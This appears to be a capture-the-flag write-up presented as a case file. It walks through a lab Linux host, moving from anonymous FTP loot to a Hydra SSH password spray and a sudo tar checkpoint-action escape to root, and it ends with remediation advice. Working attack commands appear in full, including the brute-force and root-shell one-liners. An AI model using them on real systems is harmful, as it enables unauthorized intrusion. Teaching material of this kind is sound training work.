Case file

Anonymous FTP wordlist to SSH and sudo tar abuse

Linux host with anonymous FTP leaking a task note and password candidates; SSH spray as lin succeeded; misconfigured sudo for /bin/tar yielded root via GTFOBins checkpoint-action.

Foundations20 minLinux · FTP · SSH · Privilege Escalation
01

Engagement summary

Anonymous FTP provided both a username (lin) and a password wordlist. Hydra recovered SSH access. sudo -l showed NOPASSWD-style rights on tar, which we converted into a root shell.

Against 10.10.67.0 we found vsftpd with anonymous login, OpenSSH, and Apache. FTP offered locks.txt (password candidates) and task.txt (operator identity lin). Password spraying against SSH succeeded. Privilege escalation was a single misconfiguration: lin could run /bin/tar as root.

Business impact

Anonymous FTP turned into interactive SSH and then root. Disable anonymous FTP, never store password material on public shares, and audit sudoers for GTFOBins-capable binaries (tar, find, vim, etc.).

02

Recon and anonymous FTP loot

nmap identified FTP/SSH/HTTP. Anonymous FTP yielded task.txt and locks.txt.

OPERATOR · NMAP

savvy@lab:~$ nmap -sV 10.10.67.0 -Pn

PORT STATE SERVICE VERSION

21/tcp open ftp vsftpd 3.0.3

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8

80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Anonymous login and file retrieval

OPERATOR · FTP

savvy@lab:~$ ftp 10.10.67.0

Name: Anonymous

230 Login successful.

ftp> get locks.txt

ftp> get task.txt

savvy@lab:~$ cat task.txt

1.) Protect Vicious.

2.) Plan for Red Eye pickup on the moon.

-lin

03

SSH spray with FTP wordlist

Hydra with locks.txt recovered RedDr4gonSynd1cat3 for user lin.

OPERATOR · HYDRA

savvy@lab:~$ hydra -l lin -P locks.txt ssh://10.10.67.0 -V

[22][ssh] host: 10.10.67.0 login: lin password: RedDr4gonSynd1cat3

savvy@lab:~$ ssh lin@10.10.67.0

savvy@lab:~/Desktop$

04

Privilege escalation via sudo tar

sudo -l permitted /bin/tar as root. GTFOBins checkpoint-action spawned /bin/sh.

OPERATOR · SUDO -L

savvy@lab:~/Desktop$ sudo -l

User lin may run the following commands on bountyhacker:

(root) /bin/tar

tar checkpoint-action → root shell

OPERATOR · GTFOBINS

savvy@lab:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

tar: Removing leading `/' from member names

# whoami

root

Remediation

Remove tar from sudoers. Prefer narrowly scoped scripts over raw binaries. Disable anonymous FTP and rotate any passwords that appeared in locks.txt.